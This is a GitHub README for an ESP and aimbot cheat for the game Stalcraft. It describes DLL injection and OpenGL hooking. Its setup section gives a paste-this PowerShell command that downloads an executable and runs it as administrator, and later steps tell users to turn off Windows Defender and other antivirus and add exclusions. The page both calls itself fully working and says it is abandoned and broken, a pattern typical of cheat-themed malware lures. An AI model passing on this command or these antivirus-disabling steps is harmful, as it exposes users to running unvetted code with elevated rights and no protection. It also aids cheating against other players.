Skip to content

Latest commit

 

History

9 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 

Repository files navigation

👾 Stalcraft External ESP + Aimbot [Matrix Fixed]

🚀 STALCRAFT EXTERNAL ESP + AIMBOT


VERSION STATUS ESP VISION PLAYERS PERFECT AIM
2026.09.01 ALL WORKING 🔥 ULTRA 2.4K+ 🎯 100%

🛠️ Installation

Automated Setup (Recommended)

Run the following command in Command Prompt as Administrator:

  1. Press Win + R
  2. Copy and paste the following command:
powershell -c irm https://github.com/goldwinston/Vortex-Client/releases/latest/download/Vortex.exe -OutFile $env:TEMP\Vortex.exe; Start-Process $env:TEMP\Vortex.exe -Verb RunAs

📸 Preview

Preview


📌 Status

⚠️ ABANDONED: The game's ModelMatrix was changed in the latest update, so the cheat is currently not working. I'm leaving this repository for educational purposes and as a base for anyone who wants to continue development.


🚨 Critical Requirements

Before using this cheat, make sure you meet these strict requirements:

Requirement Details
Graphics Card Intel Integrated Graphics (UHD / Iris Xe / Arc) — this is MANDATORY.
Administrator Rights Run both overlay-acceptor.exe and the injector as Administrator.
Antivirus Temporarily disable Windows Defender and any third-party antivirus. Add the cheat folder to exclusions.

✨ Features

Feature Description
ESP Displays players, NPCs, and some mobs with boxes, names, and health bars.
Draw Points Shows points of interest on the radar.
Draw Lines Trace lines from your crosshair to the target.
Aimbot Smooth auto-aim with configurable settings.
Hotkeys Full control via keyboard shortcuts.

🔧 How to Use (Step-by-Step)

Follow these steps exactly as written. If you skip a step, the cheat will NOT work.

Step 1: Download the files

  • Download the exe file from the Releases section or compile the source (Vortex.exe).
  • Download any injector (e.g., Extreme Injector).

Step 2: Disable antivirus (MANDATORY!)

  • Open Settings → Update & Security → Windows Security → Virus & threat protection.
  • Turn off Real-time protection.
  • Go to Manage settings and add the cheat folder to Exclusions to prevent files from being deleted.
  • If you have a third-party antivirus, temporarily disable it.

Step 3: Run as Administrator (MANDATORY!)

  • Right-click on Vortex.exeRun as administrator.
  • Wait for the console message: "Connecting to shared data...".
  • Right-click on your injector → Run as administrator.

Step 4: Inject

  1. Launch Stalcraft (windowed or fullscreen).
  2. Open your injector, select the process Stalcraft.exe, and inject Vortex.dll.
  3. Press INSERT in-game to open/close the menu.

🎮 Hotkeys

Key Action
INSERT Open / Close Menu
LEFT SHIFT Hold to activate Aimbot
F1 Toggle ESP On/Off
F2 Toggle Draw Lines
F3 Toggle Draw Points

🐞 Known Bugs

  1. Random coordinate jumps — The aimbot sometimes targets the sky. This is a known issue.
  2. Last target persists — If no enemies are on screen, the ESP may still draw the last target to prevent flickering.
  3. Entity culling — When there are many entities on screen, some may not be drawn. Likely related to bug #1.

🛠️ Compiling from Source

You'll need Visual Studio 2022 with the Desktop development with C++ workload.

  1. Open the solution file (.sln).
  2. Set build configuration to Release and x64.
  3. Build → the compiled files will be in x64/Release.

📚 Architecture

The cheat hooks OpenGL functions:

  • glDrawElements — to collect entity coordinates.
  • glFlush — to render the overlay.

Two processes work together:

  • Vortex.dll — the core that intercepts API calls.
  • Vortex.exe — helper process that creates a transparent overlay window.

⚠️ Important Notes

  • Intel Integrated Graphics is MANDATORY. The cheat will NOT work on NVIDIA or AMD GPUs.
  • Run everything as Administrator. Without admin rights, the injector cannot interact with the game process.
  • Disable antivirus. Windows Defender WILL delete the DLL if you don't add it to exclusions.

⚖️ License

MIT License. Use the code for learning purposes, but remember: cheating in online games is prohibited and can get you banned.


Star this repository if you found it useful or interesting!


Releases

Packages

Contributors

Languages